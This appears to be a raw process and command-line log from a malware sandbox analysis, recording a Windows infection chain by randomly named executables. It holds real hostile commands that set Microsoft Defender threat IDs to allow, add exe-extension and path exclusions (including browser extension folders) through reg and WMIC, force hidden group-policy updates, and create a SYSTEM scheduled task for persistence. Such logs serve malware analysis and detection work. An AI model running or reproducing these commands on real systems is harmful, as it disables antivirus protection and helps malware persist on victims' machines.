C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x1096038,0x1096044,0x1096050

C:\Users\Admin\Pictures\LUGDqNIwCPuioSPNANHhyelx.exe

"C:\Users\Admin\Pictures\LUGDqNIwCPuioSPNANHhyelx.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe

.\Install.exe /WkfdidVYT "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe\" Wt /flgdidFfEA 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn biPxHmULFllsbMgnpt

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn biPxHmULFllsbMgnpt

C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe Wt /flgdidFfEA 385118 /S

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Users\Admin\AppData\Roaming\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

